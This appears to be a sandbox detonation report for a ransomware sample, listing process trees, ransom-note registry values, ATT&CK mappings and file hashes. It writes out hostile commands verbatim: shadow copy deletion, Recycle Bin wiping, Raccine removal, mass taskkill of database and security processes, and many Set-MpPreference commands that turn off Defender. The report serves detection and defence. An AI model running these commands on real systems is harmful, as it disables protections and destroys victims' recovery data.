Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	4372	taskkill.exe
Token: SeDebugPrivilege	4252	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4540	taskkill.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	4288	PAExec-5568-RJMQBVDN.exe
Token: SeImpersonatePrivilege	4288	PAExec-5568-RJMQBVDN.exe
Token: SeAssignPrimaryTokenPrivilege	4288	PAExec-5568-RJMQBVDN.exe
Token: SeIncreaseQuotaPrivilege	4288	PAExec-5568-RJMQBVDN.exe
Token: SeDebugPrivilege	4312	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

pid	Process
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

pid	Process
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	pid	Process	procid_target
PID 3924 wrote to memory of 3984	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	78
PID 3924 wrote to memory of 3984	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	78
PID 3924 wrote to memory of 2704	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	80
PID 3924 wrote to memory of 2704	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	80
PID 3924 wrote to memory of 752	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	82
PID 3924 wrote to memory of 752	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	82
PID 3924 wrote to memory of 4052	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	84
PID 3924 wrote to memory of 4052	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	84
PID 3924 wrote to memory of 3680	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	86
PID 3924 wrote to memory of 3680	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	86
PID 3924 wrote to memory of 1356	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	93
PID 3924 wrote to memory of 1356	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	93
PID 3924 wrote to memory of 1452	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	92
PID 3924 wrote to memory of 1452	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	92
PID 3924 wrote to memory of 3844	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	88
PID 3924 wrote to memory of 3844	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	88
PID 3924 wrote to memory of 3884	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	94
PID 3924 wrote to memory of 3884	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	94
PID 3924 wrote to memory of 3720	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	96
PID 3924 wrote to memory of 3720	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	96
PID 3924 wrote to memory of 3288	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	98
PID 3924 wrote to memory of 3288	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	98
PID 3924 wrote to memory of 3556	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	100
PID 3924 wrote to memory of 3556	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	100
PID 3924 wrote to memory of 1344	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	102
PID 3924 wrote to memory of 1344	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	102
PID 3924 wrote to memory of 2228	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	104
PID 3924 wrote to memory of 2228	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	104
PID 3924 wrote to memory of 2868	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	109
PID 3924 wrote to memory of 2868	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	109
PID 3924 wrote to memory of 760	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	107
PID 3924 wrote to memory of 760	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	107
PID 3924 wrote to memory of 3040	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	110
PID 3924 wrote to memory of 3040	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	110
PID 3924 wrote to memory of 3648	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	112
PID 3924 wrote to memory of 3648	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	112
PID 3924 wrote to memory of 3572	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	114
PID 3924 wrote to memory of 3572	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	114
PID 3924 wrote to memory of 3336	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	115
PID 3924 wrote to memory of 3336	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	115
PID 3924 wrote to memory of 2836	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	118
PID 3924 wrote to memory of 2836	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	118
PID 3924 wrote to memory of 2820	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	120
PID 3924 wrote to memory of 2820	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	120
PID 3924 wrote to memory of 3480	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	123
PID 3924 wrote to memory of 3480	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	123
PID 3924 wrote to memory of 3888	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	124
PID 3924 wrote to memory of 3888	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	124
PID 3924 wrote to memory of 4020	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	125
PID 3924 wrote to memory of 4020	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	125
PID 3924 wrote to memory of 3344	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	128
PID 3924 wrote to memory of 3344	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	128
PID 3924 wrote to memory of 1320	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	130
PID 3924 wrote to memory of 1320	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	130
PID 3924 wrote to memory of 432	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	132
PID 3924 wrote to memory of 432	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	132
PID 3924 wrote to memory of 1328	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	134
PID 3924 wrote to memory of 1328	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	134
PID 3924 wrote to memory of 1316	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	135
PID 3924 wrote to memory of 1316	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	135
PID 3924 wrote to memory of 600	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	138
PID 3924 wrote to memory of 600	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	138
PID 3924 wrote to memory of 4104	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	140
PID 3924 wrote to memory of 4104	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe	140

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3924
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:2704
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:752
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4052
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:3680
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3844
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1452
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1356
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:3884
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3720
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3288
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:3556
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2228
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:760
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3336
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4020
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:432
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4156
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4360
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4516
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4588
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4692
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4776
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5028
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1672
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3896
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4132
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4192
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4332
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4720
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4844
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4960
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4020
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  PID:3948
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:408
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:3196
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
  2⤵
  PID:4228
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4420

C:\Windows\PAExec-5568-RJMQBVDN.exe
C:\Windows\PAExec-5568-RJMQBVDN.exe -service
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4288
- C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
  "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe"
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:4616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:4620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:4888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:4020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:2268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:2996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:3940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:4780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:1440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:4272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:984
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:4488
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

Filesize
367KB

MD5
b31f6216e6bc5a6291a0b82de0377553

SHA1
0afdc5359268f7e78a0ca3c3c67752edd304a742

SHA256
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb

SHA512
